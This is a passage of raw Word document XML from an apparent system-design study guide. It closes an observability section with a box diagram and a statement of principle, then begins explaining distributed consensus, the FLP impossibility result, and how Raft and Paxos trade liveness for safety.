          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────┘</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0806033C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│       │                 │                 │                 │        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B6B8D6" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│       └────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>────</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┴</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┴</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>────────────────┘</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DDD1BF" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│                    │                                                  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C4445B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">│                    </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">                                                  </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657F4B32" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│       ┌─────────────────────────┐                                   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F74ABD5" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│       │      CORRELATION        │                                   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F0EF16" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│       │  (trace_id, service,    │                                   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B10D743" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│       │   timestamp, context)   │                                   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601F0EFD" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│       └────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>────────────┘</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">                                   </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228EDE19" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│                    │                                                  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEB24EB" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│           ┌────────</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┼</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>────────┐</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">                                       </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F44249" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">│           </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">                                       </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559FA81C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│     ┌──────────┐ ┌────┐ ┌──────────┐                               │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69011FD9" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│     │Dashboards│ │SLOs│ │ Alerts   │                                │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2FB453" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│     │(humans)  │ │    │ │(machines)│                                │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2025D4F5" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│     └──────────┘ └────┘ └──────────┘                                │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666777C5" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│                                                                      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6AA652" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  Purpose: Answer ANY question about system behavior                  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587B64E4" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  without deploying new code or reproducing the problem.              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DA5526" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>└─────────────────────────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23014FE0" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental principle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0461F947" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:t>Observability is not a tool or a product — it's a property of the system. A system is observable when you can understand its internal state from its external outputs. The goal is to instrument your system so richly that when the inevitable unexpected failure occurs, you can ask "why is this happening?" and get an answer in minutes, not hours — by correlating metrics (what changed), logs (what happened), and traces (where it happened) into a coherent explanation of causality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7452920E" w14:textId="77777777" w:rsidR="0049626E" w:rsidRDefault="0049626E" w:rsidP="00AD5AD3"/>
    <w:p w14:paraId="696EE6BE" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Consensus Algorithms in System Design — In-Depth Technical Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E96EC40" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. What Consensus Is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF23C4C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Consensus is the problem of getting multiple nodes in a distributed system to agree on a single value (or sequence of values), even when some nodes fail or messages are lost/delayed. It's the fundamental building block that enables distributed systems to behave as a single coherent entity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0022C7" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The core problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3642E6BD" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9AAE36" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>5 nodes must agree on "Who is the leader?" or "What is the next committed value?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1A2762" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="0265A54F" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Challenges:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10837EDA" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  - Nodes can crash (and maybe restart later)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA618B0" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Messages can be delayed, reordered, duplicated, or lost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420DD7DA" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - No global clock (nodes can't agree on "what time is it?")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281E9DB7" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Network can partition (subset of nodes can't communicate with others)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39952EF4" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B370655" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Yet we need: ALL non-faulty nodes to eventually agree on the SAME value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FAAD7D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>And once agreed: the decision is PERMANENT (cannot be reversed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DE809B" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why consensus matters for system design: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215"/>
        <w:gridCol w:w="6135"/>
      </w:tblGrid>
      <w:tr w:rsidR="0049626E" w:rsidRPr="0049626E" w14:paraId="7670248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F89F3D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049626E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Problem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01B456" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049626E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Why Consensus Is Needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0049626E" w:rsidRPr="0049626E" w14:paraId="183BB25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362E5A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Leader election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9D0E56" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>All nodes must agree on ONE leader (not zero, not two)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0049626E" w:rsidRPr="0049626E" w14:paraId="614ADA6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3576D1" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Replicated state machine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1C0725" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>All replicas apply the same operations in the same order</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0049626E" w:rsidRPr="0049626E" w14:paraId="70A8B1C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A97198" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Distributed locks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779554" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>All nodes agree on who holds the lock</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0049626E" w:rsidRPr="0049626E" w14:paraId="611EB20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B9C9BC" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Atomic commit (2PC)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7CF70D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>All participants agree: commit or abort</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0049626E" w:rsidRPr="0049626E" w14:paraId="3BF0D85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A147CE" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Configuration management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4C94AF" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>All nodes see the same cluster configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0049626E" w:rsidRPr="0049626E" w14:paraId="561E031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A74DA1" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Total order broadcast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59E7CA" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>All nodes deliver messages in the same order</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5869EAAA" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Without consensus:</w:t>
      </w:r>
      <w:r w:rsidRPr="0049626E">
        <w:t> Split-brain (two leaders), data divergence, lost updates, corrupted state. </w:t>
      </w:r>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>With consensus:</w:t>
      </w:r>
      <w:r w:rsidRPr="0049626E">
        <w:t> Single source of truth, consistent replicated state, safe coordination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725C5D03" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:pict w14:anchorId="04AE5205">
          <v:rect id="_x0000_i6239" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C693373" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. The FLP Impossibility Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE7AA41" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental theoretical limit (Fischer, Lynch, Paterson, 1985):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347B5389" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A407307" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:lastRenderedPageBreak/>
        <w:t>In an ASYNCHRONOUS system where even ONE node can crash:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1589BF98" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  It is IMPOSSIBLE to guarantee consensus will be reached in bounded time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6087DAFF" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="56E94BFE" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>"Asynchronous" means: no upper bound on message delivery time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F152391" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  You can NEVER distinguish between:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790258C6" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">    a) A node that crashed (dead forever)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A14A1BB" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">    b) A node that's very slow (will respond eventually)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348D823D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CA28F1" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  If you wait forever for a slow node → liveness violated (no progress).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9163AA" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  If you proceed without it → safety violated (it might still be alive with different state).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA960D9" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What this means in practice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F55AD8" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Consensus algorithms don't defy FLP — they work around it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AAED9C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1588"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Raft/Paxos:</w:t>
      </w:r>
      <w:r w:rsidRPr="0049626E">
        <w:t> Guarantee SAFETY always (never disagree). Sacrifice liveness during certain failure scenarios (may get stuck temporarily but never produce wrong answers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086A24AF" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1588"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use timeouts as heuristics:</w:t>
      </w:r>
      <w:r w:rsidRPr="0049626E">
        <w:t> "If no response in 5 seconds, ASSUME dead." This can be wrong, but allows progress.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0E0B17" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1588"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
